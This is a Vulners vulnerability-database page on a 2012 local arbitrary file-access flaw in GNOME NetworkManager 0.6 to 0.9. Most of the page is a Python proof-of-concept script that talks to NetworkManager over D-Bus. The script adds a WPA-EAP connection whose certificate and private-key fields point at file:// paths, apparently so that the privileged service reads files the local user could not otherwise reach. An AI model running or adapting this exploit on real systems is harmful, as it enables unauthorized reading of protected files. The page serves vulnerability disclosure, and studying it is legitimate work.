Vulners
Lucene search
GNOME NetworkManager 0.x - Local Arbitrary File Access
source: https://www.securityfocus.com/bid/52206/info
GNOME NetworkManager is prone to a local arbitrary file-access vulnerability.
Local attackers can exploit this issue to read arbitrary files. This may lead to further attacks.
NetworkManager 0.6, 0.7, and 0.9 are vulnerable; other versions may also be affected.
#!/usr/bin/python
#
# Copyright (C) 2011 SUSE LINUX Products GmbH
#
# Author: Ludwig Nussel
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# version 2 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import gobject
import dbus
import dbus.service
import dbus.mainloop.glib
import os
import subprocess
def N_(x): return x
_debug_level = 0
def debug(level, msg):
if (level <= _debug_level):
print '<%d>'%level, msg
class NetworkManager(gobject.GObject):
NM_STATE = {
0: 'UNKNOWN',
10: 'UNMANAGED',
20: 'UNAVAILABLE',
30: 'DISCONNECTED',
40: 'PREPARE',
50: 'CONFIG',
60: 'NEED_AUTH',
70: 'IP_CONFIG',
80: 'IP_CHECK',
90: 'SECONDARIES',
100: 'ACTIVATED',
110: 'DEACTIVATING',
120: 'FAILED',
}
NM_DEVICE_TYPE = {
0: 'NM_DEVICE_TYPE_UNKNOWN', # The device type is unknown.
1: 'NM_DEVICE_TYPE_ETHERNET', # The device is wired Ethernet device.
2: 'NM_DEVICE_TYPE_WIFI', # The device is an 802.11 WiFi device.
3: 'NM_DEVICE_TYPE_UNUSED1', # Unused
4: 'NM_DEVICE_TYPE_UNUSED2', # Unused
5: 'NM_DEVICE_TYPE_BT', # The device is Bluetooth device that provides PAN or DUN capabilities.
6: 'NM_DEVICE_TYPE_OLPC_MESH', # The device is an OLPC mesh networking device.
7: 'NM_DEVICE_TYPE_WIMAX', # The device is an 802.16e Mobile WiMAX device.
8: 'NM_DEVICE_TYPE_MODEM', # The device is a modem supporting one or more of analog telephone, CDMA/EVDO, GSM/UMTS/HSPA, or LTE standards to access a cellular or wireline data network.
}
NM_802_11_AP_SEC = {
'NM_802_11_AP_SEC_NONE': 0x0, # Null flag.
'NM_802_11_AP_SEC_PAIR_WEP40': 0x1, # Access point supports pairwise 40-bit WEP encryption.
'NM_802_11_AP_SEC_PAIR_WEP104': 0x2, # Access point supports pairwise 104-bit WEP encryption.
'NM_802_11_AP_SEC_PAIR_TKIP': 0x4, # Access point supports pairwise TKIP encryption.
'NM_802_11_AP_SEC_PAIR_CCMP': 0x8, # Access point supports pairwise CCMP encryption.
'NM_802_11_AP_SEC_GROUP_WEP40': 0x10, # Access point supports a group 40-bit WEP cipher.
'NM_802_11_AP_SEC_GROUP_WEP104': 0x20, # Access point supports a group 104-bit WEP cipher.
'NM_802_11_AP_SEC_GROUP_TKIP': 0x40, # Access point supports a group TKIP cipher.
'NM_802_11_AP_SEC_GROUP_CCMP': 0x80, # Access point supports a group CCMP cipher.
'NM_802_11_AP_SEC_KEY_MGMT_PSK': 0x100, # Access point supports PSK key management.
'NM_802_11_AP_SEC_KEY_MGMT_802_1X': 0x200, # Access point supports 802.1x key management.
}
def __init__(self):
self.bus = dbus.SystemBus()
self.proxy = None
self.manager = None
self.running = False
self.devices = {}
self.devices_by_name = {}
self.aps = {}
self.ap_by_addr = {}
self.ap_by_ssid = {}
self.check_status()
self.bus.add_signal_receiver(
lambda name, old, new: self.nameowner_changed_handler(name, old, new),
bus_name='org.freedesktop.DBus',
dbus_interface='org.freedesktop.DBus',
signal_name='NameOwnerChanged')
self.bus.add_signal_receiver(
lambda device, **kwargs: self.device_add_rm(device, True, **kwargs),
bus_name='org.freedesktop.NetworkManager',
dbus_interface = 'org.freedesktop.NetworkManager',
signal_name = 'DeviceAdded',
sender_keyword = 'sender')
self.bus.add_signal_receiver(
lambda device, **kwargs: self.device_add_rm(device, False, **kwargs),
bus_name='org.freedesktop.NetworkManager',
dbus_interface = 'org.freedesktop.NetworkManager',
signal_name = 'DeviceRemoved',
sender_keyword = 'sender')
def cleanup(self):
self.switcher = None
def devstate2name(self, state):
if state in self.NM_STATE:
return self.NM_STATE[state]
return "UNKNOWN:%s"%state
def devtype2name(self, type):
if type in self.NM_DEVICE_TYPE:
return self.NM_DEVICE_TYPE[type]
return "UNKNOWN:%s"%type
def secflags2str(self, flags):
a = []
for key in self.NM_802_11_AP_SEC.keys():
if self.NM_802_11_AP_SEC[key] and flags&self.NM_802_11_AP_SEC[key]:
a.append(key[len('NM_802_11_AP_SEC_'):])
return ' '.join(a)
def nameowner_changed_handler(self, name, old, new):
if name != 'org.freedesktop.NetworkManager':
return
off = old and not new
self.check_status(off)
def device_add_rm(self, device, added, sender=None, **kwargs):
if (added):
dev = self.bus.get_object("org.freedesktop.NetworkManager", device)
props = dbus.Interface(dev, "org.freedesktop.DBus.Properties")
name = props.Get("org.freedesktop.NetworkManager.Device", "Interface")
devtype = props.Get("org.freedesktop.NetworkManager.Device", "DeviceType")
debug(0,"device %s, %s added"%(name, self.devtype2name(devtype)))
self.devices[device] = name
self.devices_by_name[name] = device
if devtype == 2:
wifi = dbus.Interface(dev, "org.freedesktop.NetworkManager.Device.Wireless")
aps = wifi.GetAccessPoints()
for path in aps:
ap = self.bus.get_object("org.freedesktop.NetworkManager", path)
props = dbus.Interface(ap, "org.freedesktop.DBus.Properties")
ssid_raw = props.Get("org.freedesktop.NetworkManager.AccessPoint", "Ssid")
addr = props.Get("org.freedesktop.NetworkManager.AccessPoint", "HwAddress")
wpaflags = props.Get("org.freedesktop.NetworkManager.AccessPoint", "WpaFlags")
rsnflags = props.Get("org.freedesktop.NetworkManager.AccessPoint", "RsnFlags")
ssid = ''
for b in ssid_raw:
if b > 20 and b < 126:
ssid += str(b)
else:
ssid += '0x%02x'%b
self.aps[path] = {
'Ssid' : ssid_raw,
'_ssid_readable' : ssid,
'HwAddress' : addr,
'WpaFlags' : wpaflags,
'RsnFlags' : rsnflags,
}
self.ap_by_addr[addr] = path
if not ssid in self.ap_by_ssid:
self.ap_by_ssid[ssid] = set({})
self.ap_by_ssid[ssid].add(path)
for ssid in sorted(self.ap_by_ssid.keys()):
print ssid
for path in self.ap_by_ssid[ssid]:
ap = self.aps[path]
print ' ', ap['HwAddress']
if ap['WpaFlags']:
print " WPA: ", self.secflags2str(ap['WpaFlags'])
if ap['RsnFlags']:
print " RSN: ", self.secflags2str(ap['RsnFlags'])
else:
if not device in self.devices:
debug(0, "got remove signal for unknown device %s removed"%device)
else:
name = self.devices[device]
del self.devices[device]
del self.devices_by_name[name]
debug(0,"device %s removed"%name)
def _connect_nm(self):
try:
self.proxy = self.bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager")
self.manager = manager = dbus.Interface(self.proxy, "org.freedesktop.NetworkManager")
running = True
except dbus.DBusException, e:
running = False
print e
return running
def check_status(self, force_off=False):
if (force_off):
running = False
else:
running = self.running
if (not self.manager):
running = self._connect_nm()
if (running):
if (not self.running):
devices = self.manager.GetDevices()
for d in devices:
self.device_add_rm(d, True)
if (not running):
self.proxy = self.manager = None
self.running = running
debug(1,"NM Running: %s"%self.running)
def addcon(self, params, device, ap = '/'):
if device[0] != '/':
if not device in self.devices_by_name:
print "Error: device not known"
sys.exit(1)
device = self.devices_by_name[device]
if ap[0] != '/' and not 'ssid' in params['802-11-wireless']:
params['802-11-wireless']['ssid'] = [dbus.Byte(ord(c)) for c in ap]
if not ap in self.ap_by_ssid:
print "Warning: ssid not known"
ap = '/'
else:
ap = '/'
self.manager.AddAndActivateConnection(params, device, ap)
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser(usage="%prog [options]")
parser.add_option('--debug', dest="debug", metavar='N',
action='store', type='int', default=0,
help="debug level")
(opts, args) = parser.parse_args()
if opts.debug:
_debug_level = opts.debug
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
mainloop = gobject.MainLoop()
bus = dbus.SystemBus()
nm = NetworkManager()
if len(args) == 0:
#mainloop.run()
True
elif args[0] == 'new':
conn = {
'connection': {
'permissions': [ 'user:joesix:' ],
'autoconnect': False,
'type': '802-11-wireless',
},
'802-11-wireless': {
#'ssid': [ dbus.Byte(ord(c)) for c in "something" ],
'mode': 'infrastructure',
'security': '802-11-wireless-security',
},
'802-1x': {
'eap': [ 'tls' ], # peap, ttls
'client-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cert.pem' ] + [ dbus.Byte(0) ],
'private-key': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/key.pem' ] + [ dbus.Byte(0) ],
'ca-cert': [ dbus.Byte(ord(c)) for c in 'file:///home/foo/certs/cacert.pem' ] + [ dbus.Byte(0) ],
'private-key-password': "12345",
#'ca-cert': 'hash://server/sha256/5336d308fa263f9f07325baae58ac972876f419527a9bf67c5ede3e668d3a925',
#'subject-match': '/CN=blah/emailAddress=foo@bar',
#'phase2-auth': 'mschapv2',
'identity': 'test1',
#'password': 'test1',
},
'802-11-wireless-security': {
'key-mgmt': 'wpa-eap',
'auth-alg': 'open',
},
}
dev = args[1]
ap = None
if len(args) > 2:
ap = args[2]
nm.addcon(conn, dev, ap)
# vim: sw=4 ts=8 noetData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Feb 2012 00:00Current
7.4High risk
Vulners AI Score7.4